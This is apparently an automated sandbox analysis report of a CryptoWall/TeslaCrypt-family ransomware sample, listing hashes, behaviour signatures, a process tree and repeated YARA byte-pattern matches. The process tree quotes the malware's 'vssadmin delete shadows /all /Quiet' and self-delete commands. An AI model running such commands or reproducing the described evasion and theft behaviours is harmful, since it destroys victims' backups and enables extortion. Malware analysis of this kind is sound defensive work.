Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
0t8amSU3vd.exe

Overview

General Information

Sample name:0t8amSU3vd.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
Analysis ID:1586217
MD5:ed98ce8f541e6871d1f39943ce09dfa3
SHA1:1fa08e8ce2c70daf4a3456eb53e48484b20d3d12
SHA256:ad340c9ea5510d1f0f6149fae0bd5349d6e8b01df4eccc9a2bb300be4bc9d981
Infos:

Detection

CryptoWall, TrojanRansom
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected CryptoWall ransomware
Yara detected TrojanRansom
AI detected suspicious sample
Contains functionality to determine the online IP of the system
Creates autostart registry keys with suspicious names
Creates files in the recycle bin to hide itself
Deletes itself after installation
Deletes shadow drive data (may be related to ransomware)
Drops a file containing file decryption instructions (likely related to ransomware)
Found Tor onion address
Found potential ransomware demand text
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs new ROOT certificates
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
May drop file containing decryption instructions (likely related to ransomware)
Modifies existing user documents (likely ransomware behavior)
Moves / writes many txt or jpg files (may be a ransomware encrypting documents)
Overwrites Mozilla Firefox settings
Searches for Windows Mail specific files
Sigma detected: DNS Query Tor .Onion Address - Sysmon
Sigma detected: Shadow Copies Deletion Using Operating Systems Utilities
Tries to harvest and steal browser information (history, passwords, etc)
Uses TOR for connection hidding
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a Chrome extension
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • 0t8amSU3vd.exe (PID: 3452 cmdline: "C:\Users\user\Desktop\0t8amSU3vd.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
    • svcmtr.exe (PID: 3504 cmdline: C:\Users\user\AppData\Roaming\svcmtr.exe MD5: ED98CE8F541E6871D1F39943CE09DFA3)
      • vssadmin.exe (PID: 3636 cmdline: "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet MD5: E23DD973E1444684EB36365DEFF1FC74)
    • cmd.exe (PID: 3532 cmdline: "C:\Windows\system32\cmd.exe" /c del C:\Users\user\Desktop\0T8AMS~1.EXE >> NUL MD5: AD7B9C14083B52BC532FBA5948342B98)
  • svcmtr.exe (PID: 3892 cmdline: "C:\Users\user\AppData\Roaming\svcmtr.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
  • svcmtr.exe (PID: 3948 cmdline: "C:\Users\user\AppData\Roaming\svcmtr.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
  • svcmtr.exe (PID: 4000 cmdline: "C:\Users\user\AppData\Roaming\svcmtr.exe" MD5: ED98CE8F541E6871D1F39943CE09DFA3)
  • chrome.exe (PID: 2696 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
    • chrome.exe (PID: 2760 cmdline: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1444 --field-trial-handle=1208,i,4485940417927276280,14403554526492516596,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
  • notepad.exe (PID: 1992 cmdline: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CryptowallCryptoWall is a ransomware, is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware and uses a Trojan horse to deliver the malicious payload.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.875409973.0000000000240000.00000004.00001000.00020000.00000000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
0000000D.00000002.406412332.0000000000240000.00000004.00001000.00020000.00000000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
0000000B.00000002.370940853.0000000000260000.00000004.00001000.00020000.00000000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
00000000.00000002.345370025.0000000000520000.00000004.00001000.00020000.00000000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
0000000C.00000002.387290975.00000000002C0000.00000004.00001000.00020000.00000000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
Click to see the 6 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
2.2.svcmtr.exe.240000.0.raw.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
  • 0x12ef7:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
12.2.svcmtr.exe.400000.1.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
  • 0x19436:$server_communication_2_0_4e: B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24 D0 19 00 00 83 3D 74 CD 4B 00 01 53 56 57 75 12 C7 44 24 14 18 4B 43 00 C7 44 24 1C 20 4B 43 00 EB 1A A1 1C CA 43 00 50 C7 44 24 18 ...
  • 0x12db0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 8C 01 00 A1 7C A0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FA DF FF FF 51 66 89 85 F8 DF FF FF E8 28 7F 01 00 83 C4 0C 33 D2 68 FE 1F ...
  • 0x12e56:$search_and_encrypt_2_0_4e_2: 0F 84 95 02 00 00 F6 85 A8 BD FF FF 10 0F 84 96 01 00 00 8D 8D D4 BD FF FF B8 1C 49 43 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE ...
  • 0x12ef7:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 CC 48 43 00 8D 85 F8 DF FF FF 68 00 10 00 00 50 E8 F6 0C 01 00 83 C4 0C 8D 8D D4 BD FF FF 51 8D 95 F8 ...
  • 0x12f86:$search_and_encrypt_2_0_4e_4: 8D 8D F8 DF FF FF B8 20 0B 4D 00 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 02 66 3B 51 02 75 0F 83 C0 04 83 C1 04 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 ...
  • 0x13045:$search_and_encrypt_2_0_4e_5: 8D 85 D4 BD FF FF 83 C4 0C 8D 50 02 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 8D 95 D4 BD FF FF D1 F8 52 8D 78 01 E8 89 0C 01 00 83 C4 04 8B F0 57 56 E8 B8 0A 01 00 8B 3D CC 12 43 00 68 28 49 43 ...
  • 0x19430:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8 50 26 01 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x1d2e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8 A0 E7 00 00 A1 7C A0 43 00 33 C4 89 84 24
  • 0x19430:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 D4 19 00 00 E8
  • 0x1d2e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 78 20 00 00 E8
  • 0x1d9b0:$file_search_3_1: 55 8B EC B8 94 58 01 00 E8 D3 E0 00 00 A1 7C A0 43 00 33 C5 89 45 FC 53 56 57 33 C0 68 FE 1F 00 00 50 8D 8D FE DF FF FF 51 66 89 85 FC DF FF FF E8
